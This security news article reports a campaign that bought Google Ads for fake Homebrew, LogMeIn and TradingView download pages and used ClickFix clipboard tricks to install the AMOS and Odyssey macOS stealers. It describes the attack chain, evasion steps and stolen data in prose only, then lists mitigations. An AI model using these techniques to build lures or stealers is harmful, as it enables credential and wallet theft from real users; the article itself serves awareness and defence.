Threat Actors Abusing Google Ads To Deploy Odyssey And AMOS

A recent campaign demonstrates how modern malvertising, ads pointing to malicious websites, can use legitimate search channels to trick technically sophisticated users into installing powerful macOS information-stealing malware.

Operators bought Google Ads that pointed to convincing fake download pages impersonating Homebrew, LogMeIn, and TradingView, then used social-engineering "ClickFix" tricks to get targets to paste Terminal commands that installed either AMOS (Atomic macOS Stealer) or the newer Odyssey stealer.

Researchers from Hunt.io describe the campaign's playbooks as high-quality landing pages promoted in search results that convince developers and power users to run an installer command and thereby hand the attacker root-level access.

The operators crafted dozens of domains that mimicked well-known macOS developer services and tools. Hunt.io's analysis found more than 85 impersonator domains and multiple clusters of pages designed to look like genuine download portals for Homebrew and other developer software.

The threat actors then used Google Ads to promote those pages so they appeared in normal search results, increasing the chance that a developer would click a top-ranked entry and trust the page.

The malicious pages used two psychological levers. First, they matched the visual style and wording of the genuine services, lowering suspicion. Second, they presented a short "installer" step that looked like a routine command-line action, often an instruction to copy a curl or similar command into the Terminal.

When targets clicked a copy button, the campaign sometimes placed a different, base64-encoded command on the clipboard (not the harmless Cloudflare or verification text shown on screen). Pasting and running that clipboard content fetched an install.sh script, removed macOS quarantine flags, and executed a binary without the user deliberately launching an application bundle from Finder.

As the sites were promoted through Google Ads and visually convincing, the campaign reached users who would otherwise expect safety following search results. The attackers also implemented common sandbox-and-analysis checks, such as altering behavior if they detect a virtual machine or analysis environment, thus making forensic inspection and automated detection much harder.

Once the installer script ran, it downloaded and launched one of two families of infostealers: AMOS (sometimes called Atomic Stealer or Atomic macOS Stealer) or the newer Odyssey stealer. Both families aim to harvest high-value data from a macOS host: browser cookies and stored credentials across Chrome, Firefox, and Safari; saved passwords and macOS Keychain items; cryptocurrency wallet extensions and private keys; and selected files by scanning for specific file extensions. Attackers typically package stolen data and exfiltrate it to command-and-control servers.

The installers frequently include pragmatic steps to reduce detection and friction: removing quarantine attributes, invoking sudo to escalate privileges, and manipulating system services. Hence, malicious processes blend in with legitimate system activity. Analysts observed the malware explicitly checking hardware and memory signatures, interacting with XPC services, and killing update daemons for cloud services to prevent interference. All these behaviors make the compromise both stealthy and persistent.

AMOS and Odyssey

AMOS has operated as malware-as-a-service since at least 2023. As a Malware-as-a-Service (MaaS) offering, its functionality and distribution evolve with active development and commercial availability to other threat actors.

AMOS's core capabilities include the extraction of browser-stored credentials and cookies, harvesting cryptocurrency wallet data (including common browser extensions), and exfiltrating those artifacts to attacker-controlled endpoints.

Recent variants added a backdoor module, enabling remote access and longer-term persistence beyond one-shot data theft. Researchers note that AMOS checks for analysis environments will alter execution to avoid sandbox detection.

From a technical standpoint, AMOS commonly arrives via a shell script that decodes and downloads a Mach-O binary. The binary then attempts to disable or evade simple platform protections by clearing quarantine flags. Gatekeeper prompts are suppressed or bypassed, sudo is invoked for privileged actions, and services and processes are manipulated to hide network traffic and file activity.

The collected artifacts are compressed and uploaded to command-and-control (C2) servers under operator control.

Odyssey is a more recent family that researchers connect to the same ecosystem as Poseidon and forks of AMOS. It shares many common goals with infostealers, such as credential and cookie theft, wallet and Keychain access, but researchers observed additional techniques reflecting its evolution.

Notably, instances where Odyssey samples carried valid Apple developer signatures; in some cases, attackers abused code signing to make their binaries look legitimate and reduce friction with macOS security mechanisms. Odyssey also exhibits careful process injection behaviors and deliberate attempts to mix legitimate system APIs with malicious flows to avoid heuristic detection.

Where AMOS presents a commodified, subscription-based tool, Odyssey appears to be an actively developed fork with improvements in stealth and compatibility; both remain focused on harvest-and-exfiltrate operations. Analysts emphasize that stolen credentials and wallets are the primary payoff and that operator infrastructure, including domains and C2 servers, receives continuous updates to support multiple campaigns.

A short list of low-effort, high-impact mitigation measures can be adopted to prevent AMOS and Odyssey from ruining your day:

• Prefer official canonical pages for installers (for example, Homebrew's canonical site is brew.sh) and verify installer instructions against official docs.
• Treat any instruction that asks you to paste a command into the Terminal as suspect. Inspect copied text before running it, and, when in doubt, fetch installers from known package repositories or the vendor's site.
• Keep macOS up to date, enable built-in protections (Gatekeeper, SIP), and consider endpoint detection tools that can spot unusual process trees or exfiltration.

The campaign shows how malvertising can scale targeted attacks without relying on traditional phishing emails. By buying legitimate ad placements and mirroring trusted services, attackers lower the barrier to compromise and reach a developer audience that often executes command-line installs as routine.

The malware families involved, a commercialized AMOS and the evolving Odyssey stealer, focus on high-value credentials and wallet theft, and they incorporate evasive and privilege-escalation techniques to increase their chances of success.